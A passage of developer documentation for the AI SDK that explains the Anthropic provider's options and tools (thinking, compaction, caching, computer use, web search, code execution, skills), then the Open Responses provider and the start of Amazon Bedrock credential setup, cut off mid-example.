  prompt: 'How many people will live in the world in 2040?',
  providerOptions: {
    anthropic: {
      effort: 'low',
    } satisfies AnthropicLanguageModelOptions,
  },
});

console.log(text); // resulting text
console.log(usage); // token usage

Fast Mode

Anthropic supports a speed option for claude-opus-4-6 that enables faster inference with approximately 2.5x faster output token speeds.

import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text } = await generateText({
  model: anthropic('claude-opus-4-6'),
  prompt: 'Write a short poem about the sea.',
  providerOptions: {
    anthropic: {
      speed: 'fast',
    } satisfies AnthropicLanguageModelOptions,
  },
});

The speed option accepts 'fast' or 'standard' (default behavior).

Task Budgets

Task budgets are advisory — they do not enforce a hard token limit. The model will attempt to stay within budget, but actual usage may vary.

import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text } = await generateText({
  model: anthropic('claude-opus-4-7'),
  prompt: 'Research the pros and cons of Rust vs Go for building CLI tools.',
  providerOptions: {
    anthropic: {
      taskBudget: {
        type: 'tokens',
        total: 400000,
      },
    } satisfies AnthropicLanguageModelOptions,
  },
});

For long-running agents that compact and restart context, you can carry the remaining budget forward using the remaining field:

taskBudget: {
  type: 'tokens',
  total: 400000,
  remaining: 215000, // budget left after prior compacted-away contexts
}

The taskBudget object accepts:

type "tokens" - Budget type. Currently only "tokens" is supported.
total number - Total task budget for the agentic turn. Minimum 20,000.
remaining number - Budget left after prior compacted-away contexts. Must be between 0 and total. Defaults to total if omitted.

Data Residency

Anthropic supports an inferenceGeo option that controls where model inference runs for a request.

import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text } = await generateText({
  model: anthropic('claude-opus-4-6'),
  prompt: 'Summarize the key points of this document.',
  providerOptions: {
    anthropic: {
      inferenceGeo: 'us',
    } satisfies AnthropicLanguageModelOptions,
  },
});

The inferenceGeo option accepts 'us' (US-only infrastructure) or 'global' (default, any available geography).

Reasoning

Anthropic models support extended thinking, where Claude shows its reasoning process before providing a final answer.

Adaptive Thinking

For newer models (claude-sonnet-4-6, claude-opus-4-6, and later), use adaptive thinking. Claude automatically determines how much reasoning to use based on the complexity of the prompt.

import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text, reasoningText, reasoning } = await generateText({
  model: anthropic('claude-opus-4-6'),
  prompt: 'How many people will live in the world in 2040?',
  providerOptions: {
    anthropic: {
      thinking: { type: 'adaptive' },
    } satisfies AnthropicLanguageModelOptions,
  },
});

console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning
console.log(text); // text response

You can combine adaptive thinking with the effort option to control how much reasoning Claude uses:

const { text } = await generateText({
  model: anthropic('claude-opus-4-6'),
  prompt: 'Invent a new holiday and describe its traditions.',
  providerOptions: {
    anthropic: {
      thinking: { type: 'adaptive' },
      effort: 'max', // 'low' | 'medium' | 'high' | 'max'
    } satisfies AnthropicLanguageModelOptions,
  },
});

Thinking Display (Opus 4.7+)

const { text, reasoningText } = await generateText({
  model: anthropic('claude-opus-4-7'),
  providerOptions: {
    anthropic: {
      thinking: { type: 'adaptive', display: 'summarized' },
    } satisfies AnthropicLanguageModelOptions,
  },
  prompt: 'How many people will live in the world in 2040?',
});

console.log(reasoningText); // reasoning text (empty without display: 'summarized')
console.log(text);

Budget-Based Thinking

For earlier models (claude-opus-4-20250514, claude-sonnet-4-20250514, claude-sonnet-4-5-20250929), use type: 'enabled' with an explicit token budget:

import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text, reasoningText, reasoning } = await generateText({
  model: anthropic('claude-sonnet-4-5-20250929'),
  prompt: 'How many people will live in the world in 2040?',
  providerOptions: {
    anthropic: {
      thinking: { type: 'enabled', budgetTokens: 12000 },
    } satisfies AnthropicLanguageModelOptions,
  },
});

console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning
console.log(text); // text response

See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.

Context Management

You can configure context management using the contextManagement provider option:

import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const result = await generateText({
  model: anthropic('claude-sonnet-4-5-20250929'),
  prompt: 'Continue our conversation...',
  providerOptions: {
    anthropic: {
      contextManagement: {
        edits: [
          {
            type: 'clear_tool_uses_20250919',
            trigger: { type: 'input_tokens', value: 10000 },
            keep: { type: 'tool_uses', value: 5 },
            clearAtLeast: { type: 'input_tokens', value: 1000 },
            clearToolInputs: true,
            excludeTools: ['important_tool'],
          },
        ],
      },
    } satisfies AnthropicLanguageModelOptions,
  },
});

// Check what was cleared
console.log(result.providerMetadata?.anthropic?.contextManagement);

Context Editing

Context editing strategies selectively remove specific content types from earlier in the conversation to reduce token usage without losing the overall conversation flow.

Clear Tool Uses

The clear_tool_uses_20250919 edit type removes old tool call/result pairs from the conversation history:

trigger - Condition that triggers the clearing (e.g., { type: 'input_tokens', value: 10000 } or { type: 'tool_uses', value: 10 })
keep - How many recent tool uses to preserve (e.g., { type: 'tool_uses', value: 5 })
clearAtLeast - Minimum amount to clear (e.g., { type: 'input_tokens', value: 1000 })
clearToolInputs - Whether to clear tool input parameters (boolean)
excludeTools - Array of tool names to never clear

Clear Thinking

The clear_thinking_20251015 edit type removes thinking/reasoning blocks from earlier turns, keeping only the most recent ones:

keep - How many recent thinking turns to preserve (e.g., { type: 'thinking_turns', value: 2 }) or 'all' to keep everything

const result = await generateText({
  model: anthropic('claude-opus-4-20250514'),
  prompt: 'Continue reasoning...',
  providerOptions: {
    anthropic: {
      thinking: { type: 'enabled', budgetTokens: 12000 },
      contextManagement: {
        edits: [
          {
            type: 'clear_thinking_20251015',
            keep: { type: 'thinking_turns', value: 2 },
          },
        ],
      },
    } satisfies AnthropicLanguageModelOptions,
  },
});

Compaction

import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { streamText } from 'ai';

const result = streamText({
  model: anthropic('claude-opus-4-6'),
  messages: conversationHistory,
  providerOptions: {
    anthropic: {
      contextManagement: {
        edits: [
          {
            type: 'compact_20260112',
            trigger: {
              type: 'input_tokens',
              value: 50000, // trigger compaction when input exceeds 50k tokens
            },
            instructions:
              'Summarize the conversation concisely, preserving key decisions and context.',
            pauseAfterCompaction: false,
          },
        ],
      },
    } satisfies AnthropicLanguageModelOptions,
  },
});

Configuration:

trigger - Condition that triggers compaction (e.g., { type: 'input_tokens', value: 50000 })
instructions - Custom instructions for how the model should summarize the conversation. Use this to guide the compaction summary towards specific aspects of the conversation you want to preserve.
pauseAfterCompaction - When true, the model will pause after generating the compaction summary, allowing you to inspect or process it before continuing. Defaults to false.

When compaction occurs, the model generates a summary of the earlier context. This summary appears as a text block with special provider metadata.

Detecting Compaction in Streams

When using streamText, you can detect compaction summaries by checking the providerMetadata on text-start events:

for await (const part of result.fullStream) {
  switch (part.type) {
    case 'text-start': {
      const isCompaction =
        part.providerMetadata?.anthropic?.type === 'compaction';
      if (isCompaction) {
        console.log('[COMPACTION SUMMARY START]');
      }
      break;
    }
    case 'text-delta': {
      process.stdout.write(part.text);
      break;
    }
  }
}

Compaction in UI Applications

When using useChat or other UI hooks, compaction summaries appear as regular text parts with providerMetadata. You can style them differently in your UI:

{
  message.parts.map((part, index) => {
    if (part.type === 'text') {
      const isCompaction =
        (part.providerMetadata?.anthropic as { type?: string } | undefined)
          ?.type === 'compaction';

      if (isCompaction) {
        return (
          <div
            key={index}
            className="bg-yellow-100 border-l-4 border-yellow-500 p-2"
          >
            <span className="font-bold">[Compaction Summary]</span>
            <div>{part.text}</div>
          </div>
        );
      }
      return <div key={index}>{part.text}</div>;
    }
  });
}

Applied Edits Metadata

After generation, you can check which edits were applied in the provider metadata:

const metadata = result.providerMetadata?.anthropic?.contextManagement;

if (metadata?.appliedEdits) {
  metadata.appliedEdits.forEach(edit => {
    if (edit.type === 'clear_tool_uses_20250919') {
      console.log(`Cleared ${edit.clearedToolUses} tool uses`);
      console.log(`Freed ${edit.clearedInputTokens} tokens`);
    } else if (edit.type === 'clear_thinking_20251015') {
      console.log(`Cleared ${edit.clearedThinkingTurns} thinking turns`);
      console.log(`Freed ${edit.clearedInputTokens} tokens`);
    } else if (edit.type === 'compact_20260112') {
      console.log('Compaction was applied');
    }
  });
}

For more details, see Anthropic's Context Management documentation.

Cache Control

Cache read and cache write (creation) token counts are returned on the standard usage object for both generateText and streamText. You can access them at result.usage.inputTokenDetails.cacheReadTokens and result.usage.inputTokenDetails.cacheWriteTokens.

import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const errorMessage = '... long error message ...';

const result = await generateText({
  model: anthropic('claude-sonnet-4-5'),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'You are a JavaScript expert.' },
        {
          type: 'text',
          text: `Error message: ${errorMessage}`,
          providerOptions: {
            anthropic: { cacheControl: { type: 'ephemeral' } },
          },
        },
        { type: 'text', text: 'Explain the error message.' },
      ],
    },
  ],
});

console.log(result.text);
console.log('Cache read tokens:', result.usage.inputTokenDetails.cacheReadTokens);
console.log(
  'Cache write tokens:',
  result.usage.inputTokenDetails.cacheWriteTokens,
);

You can also use cache control on system messages by providing multiple system messages at the head of your messages array:

const result = await generateText({
  model: anthropic('claude-sonnet-4-5'),
  messages: [
    {
      role: 'system',
      content: 'Cached system message part',
      providerOptions: {
        anthropic: { cacheControl: { type: 'ephemeral' } },
      },
    },
    {
      role: 'system',
      content: 'Uncached system message part',
    },
    {
      role: 'user',
      content: 'User prompt',
    },
  ],
});

Cache control for tools:

const result = await generateText({
  model: anthropic('claude-haiku-4-5'),
  tools: {
    cityAttractions: tool({
      inputSchema: z.object({ city: z.string() }),
      providerOptions: {
        anthropic: {
          cacheControl: { type: 'ephemeral' },
        },
      },
    }),
  },
  messages: [
    {
      role: 'user',
      content: 'User prompt',
    },
  ],
});

Longer cache TTL

Anthropic also supports a longer 1-hour cache duration.

Here's an example:

const result = await generateText({
  model: anthropic('claude-haiku-4-5'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'Long cached message',
          providerOptions: {
            anthropic: {
              cacheControl: { type: 'ephemeral', ttl: '1h' },
            },
          },
        },
      ],
    },
  ],
});

Limitations

The minimum cacheable prompt length is:

4096 tokens for Claude Opus 4.5
1024 tokens for Claude Opus 4.1, Claude Opus 4, Claude Sonnet 4.5, Claude Sonnet 4, Claude Sonnet 3.7, and Claude Opus 3
4096 tokens for Claude Haiku 4.5
2048 tokens for Claude Haiku 3.5 and Claude Haiku 3

Shorter prompts cannot be cached, even if marked with cacheControl. Any requests to cache fewer than this number of tokens will be processed without caching.

For more on prompt caching with Anthropic, see Anthropic's Cache Control documentation.

Bash Tool

The Bash Tool allows running bash commands. Here's how to create and use it:

const bashTool = anthropic.tools.bash_20250124({
  execute: async ({ command, restart }) => {
    // Implement your bash command execution logic here
    // Return the result of the command execution
  },
});

Parameters:

command (string): The bash command to run. Required unless the tool is being restarted.
restart (boolean, optional): Specifying true will restart this tool.

Memory Tool

The Memory Tool allows Claude to use a local memory, e.g. in the filesystem. Here's how to create it:

const memory = anthropic.tools.memory_20250818({
  execute: async action => {
    // Implement your memory command execution logic here
    // Return the result of the command execution
  },
});

Only certain Claude versions are supported.

Text Editor Tool

The Text Editor Tool provides functionality for viewing and editing text files.

const tools = {
  str_replace_based_edit_tool: anthropic.tools.textEditor_20250728({
    maxCharacters: 10000, // optional
    async execute({ command, path, old_str, new_str, insert_text }) {
      // ...
    },
  }),
} satisfies ToolSet;

textEditor_20250728 - For Claude Sonnet 4, Opus 4, and Opus 4.1 (recommended)
textEditor_20250124 - For Claude Sonnet 3.7
textEditor_20241022 - For Claude Sonnet 3.5

Note: textEditor_20250429 is deprecated. Use textEditor_20250728 instead.

Parameters:

command ('view' | 'create' | 'str_replace' | 'insert' | 'undo_edit'): The command to run. Note: undo_edit is only available in Claude 3.5 Sonnet and earlier models.
path (string): Absolute path to file or directory, e.g. /repo/file.py or /repo.
file_text (string, optional): Required for create command, with the content of the file to be created.
insert_line (number, optional): Required for insert command. The line number after which to insert the new string.
new_str (string, optional): New string for str_replace command.
insert_text (string, optional): Required for insert command, containing the text to insert.
old_str (string, optional): Required for str_replace command, containing the string to replace.
view_range (number[], optional): Optional for view command to specify line range to show.

Computer Tool

The Computer Tool enables control of keyboard and mouse actions on a computer:

const computerTool = anthropic.tools.computer_20251124({
  displayWidthPx: 1920,
  displayHeightPx: 1080,
  displayNumber: 0, // Optional, for X11 environments
  enableZoom: true, // Optional, enables the zoom action

  execute: async ({ action, coordinate, text, region }) => {
    // Implement your computer control logic here
    // Return the result of the action

    // Example code:
    switch (action) {
      case 'screenshot': {
        // multipart result:
        return {
          type: 'image',
          data: fs
            .readFileSync('./data/screenshot-editor.png')
            .toString('base64'),
        };
      }
      case 'zoom': {
        // region is [x1, y1, x2, y2] defining the area to zoom into
        return {
          type: 'image',
          data: fs.readFileSync('./data/zoomed-region.png').toString('base64'),
        };
      }
      default: {
        console.log('Action:', action);
        console.log('Coordinate:', coordinate);
        console.log('Text:', text);
        return `executed ${action}`;
      }
    }
  },

  // map to tool result content for LLM consumption:
  toModelOutput({ output }) {
    return typeof output === 'string'
      ? [{ type: 'text', text: output }]
      : [{ type: 'image', data: output.data, mediaType: 'image/png' }];
  },
});

Parameters:

action ('key' | 'type' | 'mouse_move' | 'left_click' | 'left_click_drag' | 'right_click' | 'middle_click' | 'double_click' | 'screenshot' | 'cursor_position' | 'zoom'): The action to perform. The zoom action is only available with computer_20251124.
coordinate (number[], optional): Required for mouse_move and left_click_drag actions. Specifies the (x, y) coordinates.
text (string, optional): Required for type and key actions.
region (number[], optional): Required for zoom action. Specifies [x1, y1, x2, y2] coordinates for the area to inspect.
displayWidthPx (number): The width of the display in pixels.
displayHeightPx (number): The height of the display in pixels.
displayNumber (number, optional): The display number for X11 environments.
enableZoom (boolean, optional): Enable the zoom action. Only available with computer_20251124. Default: false.

Web Search Tool

You can enable web search using the provider-defined web search tool:

import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const webSearchTool = anthropic.tools.webSearch_20250305({
  maxUses: 5,
});

const result = await generateText({
  model: anthropic('claude-opus-4-20250514'),
  prompt: 'What are the latest developments in AI?',
  tools: {
    web_search: webSearchTool,
  },
});

Configuration Options

The web search tool supports several configuration options:

maxUses number

Maximum number of web searches Claude can perform during the conversation.
allowedDomains string[]

Optional list of domains that Claude is allowed to search. If provided, searches will be restricted to these domains.
blockedDomains string[]

Optional list of domains that Claude should avoid when searching.
userLocation object

Optional user location information to provide geographically relevant search results.

const webSearchTool = anthropic.tools.webSearch_20250305({
  maxUses: 3,
  allowedDomains: ['techcrunch.com', 'wired.com'],
  blockedDomains: ['example-spam-site.com'],
  userLocation: {
    type: 'approximate',
    country: 'US',
    region: 'California',
    city: 'San Francisco',
    timezone: 'America/Los_Angeles',
  },
});

const result = await generateText({
  model: anthropic('claude-opus-4-20250514'),
  prompt: 'Find local news about technology',
  tools: {
    web_search: webSearchTool,
  },
});

Web Fetch Tool

You can enable web fetch using the provider-defined web fetch tool:

import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const result = await generateText({
  model: anthropic('claude-sonnet-4-0'),
  prompt:
    'What is this page about? https://en.wikipedia.org/wiki/Maglemosian_culture',
  tools: {
    web_fetch: anthropic.tools.webFetch_20250910({ maxUses: 1 }),
  },
});

Tool Search

There are two variants:

BM25 Search - Uses natural language queries to find tools
Regex Search - Uses regex patterns (Python re.search() syntax) to find tools

Basic Usage

import { anthropic } from '@ai-sdk/anthropic';
import { generateText, tool } from 'ai';
import { z } from 'zod';

const result = await generateText({
  model: anthropic('claude-sonnet-4-5'),
  prompt: 'What is the weather in San Francisco?',
  tools: {
    toolSearch: anthropic.tools.toolSearchBm25_20251119(),

    get_weather: tool({
      description: 'Get the current weather at a specific location',
      inputSchema: z.object({
        location: z.string().describe('The city and state'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72,
        condition: 'Sunny',
      }),
      // Defer tool here - Claude discovers these via the tool search tool
      providerOptions: {
        anthropic: { deferLoading: true },
      },
    }),
  },
});

Using Regex Search

For more precise tool matching, you can use the regex variant:

const result = await generateText({
  model: anthropic('claude-sonnet-4-5'),
  prompt: 'Get the weather data',
  tools: {
    toolSearch: anthropic.tools.toolSearchRegex_20251119(),
    // ... deferred tools
  },
});

Claude will construct regex patterns like weather|temperature|forecast to find matching tools.

Custom Tool Search

You can implement your own tool search logic (e.g., using embeddings or semantic search) by returning tool-reference content blocks via toModelOutput:

import { anthropic } from '@ai-sdk/anthropic';
import { generateText, tool } from 'ai';
import { z } from 'zod';

const result = await generateText({
  model: anthropic('claude-sonnet-4-5'),
  prompt: 'What is the weather in San Francisco?',
  tools: {
    // Custom search tool
    searchTools: tool({
      description: 'Search for tools by keyword',
      inputSchema: z.object({ query: z.string() }),
      execute: async ({ query }) => {
        // Your custom search logic (embeddings, fuzzy match, etc.)
        const allTools = ['get_weather', 'get_forecast', 'get_temperature'];
        return allTools.filter(name => name.includes(query.toLowerCase()));
      },
      toModelOutput: ({ output }) => ({
        type: 'content',
        value: (output as string[]).map(toolName => ({
          type: 'custom' as const,
          providerOptions: {
            anthropic: {
              type: 'tool-reference',
              toolName,
            },
          },
        })),
      }),
    }),

    // Deferred tools
    get_weather: tool({
      description: 'Get the current weather',
      inputSchema: z.object({ location: z.string() }),
      execute: async ({ location }) => ({ location, temperature: 72 }),
      providerOptions: {
        anthropic: { deferLoading: true },
      },
    }),
  },
});

This sends tool_reference blocks to Anthropic, which loads the corresponding deferred tool schemas into Claude's context.

MCP Connectors

Anthropic supports connecting to MCP servers as part of their execution.

You can enable this feature with the mcpServers provider option:

import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const result = await generateText({
  model: anthropic('claude-sonnet-4-5'),
  prompt: `Call the echo tool with "hello world". what does it respond with back?`,
  providerOptions: {
    anthropic: {
      mcpServers: [
        {
          type: 'url',
          name: 'echo',
          url: 'https://echo.mcp.inevitable.fyi/mcp',
          // optional: authorization token
          authorizationToken: mcpAuthToken,
          // optional: tool configuration
          toolConfiguration: {
            enabled: true,
            allowedTools: ['echo'],
          },
        },
      ],
    } satisfies AnthropicLanguageModelOptions,
  },
});

The tool calls and results are dynamic, i.e. the input and output schemas are not known.

Configuration Options

The web fetch tool supports several configuration options:

maxUses number

The maxUses parameter limits the number of web fetches performed.
allowedDomains string[]

Only fetch from these domains.
blockedDomains string[]

Never fetch from these domains.
citations object

Unlike web search where citations are always enabled, citations are optional for web fetch. Set "citations": {"enabled": true} to enable Claude to cite specific passages from fetched documents.
maxContentTokens number

The maxContentTokens parameter limits the amount of content that will be included in the context.

Error Handling

Web search errors are handled differently depending on whether you're using streaming or non-streaming:

Non-streaming (generateText): Web search errors throw exceptions that you can catch:

try {
  const result = await generateText({
    model: anthropic('claude-opus-4-20250514'),
    prompt: 'Search for something',
    tools: {
      web_search: webSearchTool,
    },
  });
} catch (error) {
  if (error.message.includes('Web search failed')) {
    console.log('Search error:', error.message);
    // Handle search error appropriately
  }
}

Streaming (streamText): Web search errors are delivered as error parts in the stream:

const result = await streamText({
  model: anthropic('claude-opus-4-20250514'),
  prompt: 'Search for something',
  tools: {
    web_search: webSearchTool,
  },
});

for await (const part of result.textStream) {
  if (part.type === 'error') {
    console.log('Search error:', part.error);
    // Handle search error appropriately
  }
}

Code Execution

Anthropic provides a provider-defined code execution tool that gives Claude direct access to a real Python environment allowing it to execute code to inform its responses.

You can enable code execution using the provider-defined code execution tool:

import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const codeExecutionTool = anthropic.tools.codeExecution_20260120();

const result = await generateText({
  model: anthropic('claude-opus-4-20250514'),
  prompt:
    'Calculate the mean and standard deviation of [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]',
  tools: {
    code_execution: codeExecutionTool,
  },
});

Error Handling

Code execution errors are handled differently depending on whether you're using streaming or non-streaming:

Non-streaming (generateText): Code execution errors are delivered as tool result parts in the response:

const result = await generateText({
  model: anthropic('claude-opus-4-20250514'),
  prompt: 'Execute some Python script',
  tools: {
    code_execution: codeExecutionTool,
  },
});

const toolErrors = result.content?.filter(
  content => content.type === 'tool-error',
);

toolErrors?.forEach(error => {
  console.error('Tool execution error:', {
    toolName: error.toolName,
    toolCallId: error.toolCallId,
    error: error.error,
  });
});

Streaming (streamText): Code execution errors are delivered as error parts in the stream:

const result = await streamText({
  model: anthropic('claude-opus-4-20250514'),
  prompt: 'Execute some Python script',
  tools: {
    code_execution: codeExecutionTool,
  },
});
for await (const part of result.textStream) {
  if (part.type === 'error') {
    console.log('Code execution error:', part.error);
    // Handle code execution error appropriately
  }
}

Programmatic Tool Calling

To enable programmatic tool calling, use the allowedCallers provider option on tools that you want to be callable from within code execution:

import {
  anthropic,
  forwardAnthropicContainerIdFromLastStep,
} from '@ai-sdk/anthropic';
import { generateText, tool, isStepCount } from 'ai';
import { z } from 'zod';

const result = await generateText({
  model: anthropic('claude-sonnet-4-5'),
  stopWhen: isStepCount(10),
  prompt:
    'Get the weather for Tokyo, Sydney, and London, then calculate the average temperature.',
  tools: {
    code_execution: anthropic.tools.codeExecution_20260120(),

    getWeather: tool({
      description: 'Get current weather data for a city.',
      inputSchema: z.object({
        city: z.string().describe('Name of the city'),
      }),
      execute: async ({ city }) => {
        // Your weather API implementation
        return { temp: 22, condition: 'Sunny' };
      },
      // Enable this tool to be called from within code execution
      providerOptions: {
        anthropic: {
          allowedCallers: ['code_execution_20260120'],
        },
      },
    }),
  },

  // Propagate container ID between steps for code execution continuity
  prepareStep: forwardAnthropicContainerIdFromLastStep,
});

In this flow:

Claude writes Python code that calls your getWeather tool multiple times in parallel
The SDK automatically executes your tool and returns results to the code execution container
Claude processes the results in code and generates the final response

Container Persistence

Agent Skills

Using Built-in Skills

Anthropic provides several built-in skills:

pptx - Create and edit PowerPoint presentations
docx - Create and edit Word documents
pdf - Process and analyze PDF files
xlsx - Work with Excel spreadsheets

To use skills, you need to:

Enable the code execution tool
Specify the container with skills in providerOptions

import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const result = await generateText({
  model: anthropic('claude-sonnet-4-5'),
  tools: {
    code_execution: anthropic.tools.codeExecution_20260120(),
  },
  prompt: 'Create a presentation about renewable energy with 5 slides',
  providerOptions: {
    anthropic: {
      container: {
        skills: [
          {
            type: 'anthropic',
            skillId: 'pptx',
            version: 'latest', // optional
          },
        ],
      },
    } satisfies AnthropicLanguageModelOptions,
  },
});

Custom Skills

You can also use custom skills by specifying type: 'custom':

const result = await generateText({
  model: anthropic('claude-sonnet-4-5'),
  tools: {
    code_execution: anthropic.tools.codeExecution_20260120(),
  },
  prompt: 'Use my custom skill to process this data',
  providerOptions: {
    anthropic: {
      container: {
        skills: [
          {
            type: 'custom',
            skillId: 'my-custom-skill-id',
            version: '1.0', // optional
          },
        ],
      },
    } satisfies AnthropicLanguageModelOptions,
  },
});

PDF support

Anthropic Claude models support reading PDF files. You can pass PDF files as part of the message content using the file type:

Option 1: URL-based PDF document

const result = await generateText({
  model: anthropic('claude-sonnet-4-5'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'What is an embedding model according to this document?',
        },
        {
          type: 'file',
          data: new URL(
            'https://github.com/vercel/ai/blob/main/examples/ai-functions/data/ai.pdf?raw=true',
          ),
          mimeType: 'application/pdf',
        },
      ],
    },
  ],
});

Option 2: Base64-encoded PDF document

const result = await generateText({
  model: anthropic('claude-sonnet-4-5'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'What is an embedding model according to this document?',
        },
        {
          type: 'file',
          data: fs.readFileSync('./data/ai.pdf'),
          mediaType: 'application/pdf',
        },
      ],
    },
  ],
});

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Computer Use	Web Search	Tool Search	Compaction
`claude-opus-4-7`
`claude-opus-4-6`
`claude-sonnet-4-6`
`claude-opus-4-5`
`claude-haiku-4-5`
`claude-sonnet-4-5`
`claude-opus-4-1`
`claude-opus-4-0`
`claude-sonnet-4-0`

title: Open Responses description: Learn how to use the Open Responses provider for the AI SDK.

Open Responses Provider

The Open Responses provider contains language model support for Open Responses compatible APIs.

Setup

The Open Responses provider is available in the @ai-sdk/open-responses module. You can install it with

Provider Instance

Create an Open Responses provider instance using createOpenResponses:

import { createOpenResponses } from '@ai-sdk/open-responses';

const openResponses = createOpenResponses({
  name: 'aProvider',
  url: 'http://localhost:1234/v1/responses',
});

The name and url options are required:

name string

Provider name. Used as the key for provider options and metadata.
url string

URL for the Open Responses API POST endpoint.

You can use the following optional settings to customize the Open Responses provider instance:

apiKey string

API key that is being sent using the Authorization header.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function.

Language Models

The Open Responses provider instance is a function that you can invoke to create a language model:

const model = openResponses('mistralai/ministral-3-14b-reasoning');

You can use Open Responses models with the generateText and streamText functions, and they support structured data generation with Output (see AI SDK Core).

Example

import { createOpenResponses } from '@ai-sdk/open-responses';
import { generateText } from 'ai';

const openResponses = createOpenResponses({
  name: 'aProvider',
  url: 'http://localhost:1234/v1/responses',
});

const { text } = await generateText({
  model: openResponses('mistralai/ministral-3-14b-reasoning'),
  prompt: 'Invent a new holiday and describe its traditions.',
});

Notes

Stop sequences, topK, and seed are not supported and are ignored with warnings.
Image inputs are supported for user messages with file parts using image media types.

title: Amazon Bedrock description: Learn how to use the Amazon Bedrock provider.

Amazon Bedrock Provider

The Amazon Bedrock provider for the AI SDK contains language model support for the Amazon Bedrock APIs.

Setup

The Bedrock provider is available in the @ai-sdk/amazon-bedrock module. You can install it with

Prerequisites

See the Model Access Docs for more information.

Authentication

Using IAM Access Key and Secret Key

Step 1: Creating AWS Access Key and Secret Key

To get started, you'll need to create an AWS access key and secret key. Here's how:

Login to AWS Management Console

Go to the AWS Management Console and log in with your AWS account credentials.

Create an IAM User

Navigate to the IAM dashboard and click on "Users" in the left-hand navigation menu.
Click on "Create user" and fill in the required details to create a new IAM user.
Make sure to select "Programmatic access" as the access type.
The user account needs the AmazonBedrockFullAccess policy attached to it.

Create Access Key

Click on the "Security credentials" tab and then click on "Create access key".
Click "Create access key" to generate a new access key pair.
Download the .csv file containing the access key ID and secret access key.

Step 2: Configuring the Access Key and Secret Key

Within your project add a .env file if you don't already have one. This file will be used to set the access key and secret key as environment variables. Add the following lines to the .env file:

AWS_ACCESS_KEY_ID=YOUR_ACCESS_KEY_ID
AWS_SECRET_ACCESS_KEY=YOUR_SECRET_ACCESS_KEY
AWS_REGION=YOUR_REGION

Remember to replace YOUR_ACCESS_KEY_ID, YOUR_SECRET_ACCESS_KEY, and YOUR_REGION with the actual values from your AWS account.

Using AWS SDK Credentials Chain (instance profiles, instance roles, ECS roles, EKS Service Accounts, etc.)

Usage:

@aws-sdk/credential-providers package provides a set of credential providers that can be used to create a credential provider chain.

import { createAmazonBedrock } from '@ai-sdk/amazon-bedrock';
import { fromNodeProviderChain } from '@aws-sdk/credential-providers';

const bedrock = createAmazonBedrock({
  region: 'us-east-1',
  credentialProvider: fromNodeProviderChain(),
});

Provider Instance

You can import the default provider instance bedrock from @ai-sdk/amazon-bedrock:

import { bedrock } from '@ai-sdk/amazon-bedrock';

If you need a customized setup, you can import createAmazonBedrock from @ai-sdk/amazon-bedrock and create a provider instance with your settings:

import { createAmazonBedrock } from '@ai-sdk/amazon-bedrock';

const bedrock = createAmazonBedrock({
  region: 'us-east-1',
  accessKeyId: 'xxxxxxxxx',
  secretAccessKey: 'xxxxxxxxx',
  sessionToken: 'xxxxxxxxx',
});

You can use the following optional settings to customize the Amazon Bedrock provider instance:

region string

The AWS region that you want to use for the API calls. It uses the AWS_REGION environment variable by default.
accessKeyId string

The AWS access key ID that you want to use for the API calls. It uses the AWS_ACCESS_KEY_ID environment variable by default.
secretAccessKey string

The AWS secret access key that you want to use for the API calls. It uses the AWS_SECRET_ACCESS_KEY environment variable by default.
sessionToken string

Optional. The AWS session token that you want to use for the API calls. It uses the AWS_SESSION_TOKEN environment variable by default.
credentialProvider () => Promise<{ accessKeyId: string; secretAccessKey: string; sessionToken?: string; }>

Optional. The AWS credential provider chain that you want to use for the API calls. It uses the specified credentials by default.
apiKey string

Optional. API key for authenticating requests using Bearer token authentication. When provided, this will be used instead of AWS SigV4 authentication. It uses the AWS_BEARER_TOKEN_BEDROCK environment variable by default.
baseURL string

Optional. Base URL for the Bedrock API calls. Useful for custom endpoints or proxy configurations.
headers Record<string, string>

Optional. Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Optional. Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create models that call the Bedrock API using the provider instance. The first argument is the model id, e.g. meta.llama3-70b-instruct-v1:0.

const model = bedrock('meta.llama3-70b-instruct-v1:0');

Amazon Bedrock models also support some model specific provider options that are not part of the standard call settings. You can pass them in the providerOptions argument:

const model = bedrock('anthropic.claude-3-sonnet-20240229-v1:0');

await generateText({
  model,
  providerOptions: {
    anthropic: {
      additionalModelRequestFields: { top_k: 350 },
    },
  },
});

Documentation for additional settings based on the selected model can be found within the Amazon Bedrock Inference Parameter Documentation.

You can use Amazon Bedrock language models to generate text with the generateText function:

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';

const { text } = await generateText({
